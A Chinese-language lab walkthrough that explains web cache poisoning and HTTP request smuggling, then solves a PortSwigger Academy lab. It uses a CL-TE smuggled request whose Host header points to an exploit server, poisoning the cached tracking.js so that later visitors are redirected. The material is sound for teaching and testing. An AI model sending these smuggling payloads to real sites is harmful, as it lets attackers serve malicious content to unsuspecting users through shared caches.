当http请求走私和web缓存碰到一起会产生什么样的火花呢，让我们看看。在接触Http Sumggling 缓存漏洞前，我们需要先对Http Sumggling和Web缓存有所了解。什么是Web缓存 WEB缓存就是指网站的静态文件，比如图片、CSS、JS等，在网站访问的时候，服务器会将这些文件缓存起来，以便下次访问时直接从缓存中读取，不需要再次请求服务器。缓存位于服务器和客户端之间，通常出于优化用户浏览体验或其他原因以减少对服务器的访问而设定的在固定时间内保存且针对特定请求的响应，常见的缓存点有：后端程序缓存服务器缓存浏览器缓存缓存服务器 CDN缓存最常见的无疑就是CDN及其类似的缓存服务器。而为了让缓存判断是否需要提供缓存内容，在http请求中会存在缓存键 X-Cache，缓存键叫什么决定于架构师，但都是一个概念。什么是web缓存漏洞如上图所示，假设小紫小黄小绿都在服务器划分的同一批特定请求中，那么小紫一开始访问服务器时，经过缓存键X-Cache: Miss的判定，是首次访问，所以直接连接到Server服务器，而其后的小黄、小绿再次访问相同的文件时就会被判定为X-Cache: Hit，即只需连接Cache缓存服务器，不再连接到Server服务器，借此减少了Server服务器的运行负荷。这无疑是一个很不错的设计，但一旦被有心之士利用，那就会发生一些不好的事情了。如图，当攻击者改了一些包发送到后端，导致后端返回一些恶意数据，比如xss、注入等问题，而由于缓存的机制，后续的正常用户访问时就会读取缓存服务器的恶意缓存，这就是常见的web缓存漏洞，也叫缓存投毒。 Http Sumggling HTTP请求走私是一种干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术，其漏洞的主要形成原因是不同的服务器对于RFC标准的具体实现不一而导致的。一般可分为以下几种： CL: Content-Length TE: Transfer-Encoding CL不为0的GET请求 CL-CL CL-TE TE-CL TE-TE 在mengchen@知道创宇404实验室的文章中有了十分详细的论述，我这就不再赘述。 https://paper.seebug.org/1048/#35-te-teHttp Sumggling 缓存漏洞靶场依旧以Lab: Exploiting HTTP request smuggling to perform web cache poisoning为靶场。解法判断是否存在走私，确定为CL-TE。 POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 129 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: anything Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 第一次请求为： POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 129 Transfer-Encoding: chunked 第二次请求为下半段： GET /post/next?postId=3 HTTP/1.1 Host: anything Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 可以看到存在302跳转。然后我们需要找到哪里进行缓存攻击，这里我以/resources/js/tracking.js进行攻击。可以看到X-Cache为miss，这样我们就可以利用修改，进行缓存攻击。先点击send post包 POST / HTTP/1.1 Host: 0a9b0056035fcd3ec0c40506003b00aa.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 195 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: https://exploit-0a6d001c033acd49c0fa05c101130045.web-security-academy.net/ Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 访问到第一部分：然后在/resources/js/tracking.js send包：可以发现成功攻击，缓存键为miss，那下一个包应该就可以成功转接到exploit上，我们试试。对原界面进行抓包，多抓几次。发现host成功变为我们的exploit。后言漏洞越来越多，也会越来越复杂，不再是单一的某种漏洞这么简单，多种漏洞复合是未来标志。

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页第62页第63页第64页第65页第66页第67页第68页第69页第70页第71页第72页第73页第74页第75页第76页第77页第78页第79页第80页第81页第82页第83页第84页第85页第86页第87页第88页第89页第90页第91页第92页第93页第94页第95页第96页第97页第98页第99页第100页第101页第102页第103页第104页第105页第106页第107页第108页第109页第110页第111页第112页第113页第114页第115页第116页第117页第118页第119页第120页第121页第122页第123页第124页第125页第126页第127页第128页第129页第130页第131页第132页第133页第134页第135页第136页第137页第138页第139页第140页第141页第142页第143页第144页第145页第146页第147页第148页第149页第150页第151页第152页第153页第154页第155页第156页第157页第158页第159页第160页第161页第162页第163页第164页第165页第166页第167页第168页第169页第170页第171页第172页第173页第174页第175页第176页第177页第178页第179页第180页第181页第182页第183页第184页第185页第186页第187页第188页第189页第190页第191页第192页第193页第194页第195页第196页第197页第198页第199页第200页第201页第202页第203页第204页第205页第206页第207页